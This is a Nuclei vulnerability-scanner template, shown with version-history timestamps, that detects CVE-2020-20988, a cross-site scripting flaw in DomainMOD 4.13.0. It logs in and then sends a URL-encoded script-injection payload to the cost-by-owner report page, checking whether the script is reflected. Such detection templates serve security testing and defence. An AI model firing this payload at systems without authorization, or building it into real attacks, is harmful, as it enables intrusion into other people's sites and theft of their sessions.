nuclei-templates/http/cves/2020/CVE-2020-20988.yaml

56 lines
2.1 KiB
YAML
Raw Normal View History

2022-07-16 07:53:00 +00:00
id: CVE-2020-20988
2022-08-22 07:17:05 +00:00
2022-07-16 07:53:00 +00:00
info:
name: DomainMOD 4.13.0 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:22:36 +00:00
remediation: |
Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
reference:
2022-07-16 07:53:00 +00:00
- https://mycvee.blogspot.com/p/xss2.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-20988
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-20988
cwe-id: CWE-79
epss-score: 0.0009
epss-percentile: 0.37789
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:*
2022-07-18 07:21:56 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:22:36 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: domainmod
product: domainmod
2024-01-14 09:21:50 +00:00
tags: cve2020,cve,domainmod,xss,authenticated
2022-07-16 07:53:00 +00:00
http:
2022-07-16 07:53:00 +00:00
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_username={{username}}&new_password={{password}}
- |
POST /reporting/domains/cost-by-owner.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-07-18 07:21:56 +00:00
daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
2022-07-16 07:53:00 +00:00
host-redirects: true
2022-07-16 07:53:00 +00:00
max-redirects: 2
matchers:
2022-07-18 07:21:56 +00:00
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
2022-07-18 07:21:56 +00:00
- 'contains(body_2, "value=\"\"/><script>alert(document.domain)</script>")'
2022-07-18 07:44:49 +00:00
- 'contains(body_2, "DomainMOD")'
2022-07-18 07:21:56 +00:00
condition: and
# digest: 4a0a00473045022100fbb0177d572dab76f291eb8c5192458be9114f6ff475722fe228667a0a17f96602207f0bf6ee4c83004d0e951aaadb9b2b40b09318391f86ca1b5a3629de44e3adfb:922c64590222798bb761d5b6d8e72950